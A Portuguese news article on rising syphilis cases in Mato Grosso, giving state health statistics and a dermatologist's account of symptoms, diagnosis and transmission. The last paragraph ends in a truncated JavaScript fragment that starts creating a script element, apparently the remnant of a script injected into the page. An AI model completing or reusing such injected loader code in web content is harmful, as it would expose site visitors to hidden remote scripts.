Capa / Em Destaque / Casos de sífilis aumentam em MT

Casos de sífilis aumentam em MT

sifilisGD

Muito gente tem se preocupado com o zika vírus, devido aos casos de microcefalia. Porém outra doença que tem infectado mães e, consequentemente, crianças, em nosso país. Trata-se da sífilis, uma doença sexualmente transmissível (DST) que tem apresentado um aumento de casos em Mato Grosso.
Segundo dados da Secretaria Estadual de Saúde (SES), em Mato Grosso houve um aumento de 20%, onde os casos passaram de 418 para 502 entre os anos de 2014 e 2015. Só no primeiro trimestre deste ano já foram diagnosticados 74 novos casos. Desses casos 32% são mulheres e 11% homens, com faixa etária de 19 a 40 anos.
Segundo a dermatologista, Paula Villar a sífilis é uma doença infecciosa, sexualmente transmissível, resultante da infecção pela bactéria Treponema pallidum. Pode causar ulcerações, tanto no homem, quanto na mulher. Em seu estágio mais avançado, a doença pode causar cegueira, insanidade, paralisias, problemas cardíacos e até o óbito. Além disso, a sífilis pode aumentar em 3 a 5 vezes a possibilidade de transmissão do HIV.
Paula informa que o problema de um diagnóstico precoce se dá porque, como a sífilis no estágio inicial, aparece com uma pequena lesão, indolor, em uma região, geralmente, de difícil visibilidade, nem sempre o indivíduo consegue percebê-la. Além disso, nem todos os médicos pedem a sorologia para detectar a sífilis em exames de rotina.
De acordo com a especialista, o avanço da doença se deve, em grande parte, ao sexo sem camisinha. A maioria dos casais que já estão casados, não utilizam a camisinha, e se algum deles contrair a doença fora de casa, consequentemente, o outro também será infectado: “A mulher muitas vezes não tem força de voz, e acaba como a mais prejudicada nisso tudo, pois as vezes os maridos vão junto com a mulher em uma consulta, alegando que a mulher pegou a sífilis em um assento sanitário, pressionando o médico para não revelar a verdade, de que ela pegou a doença em uma relação sexual com o marido”.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top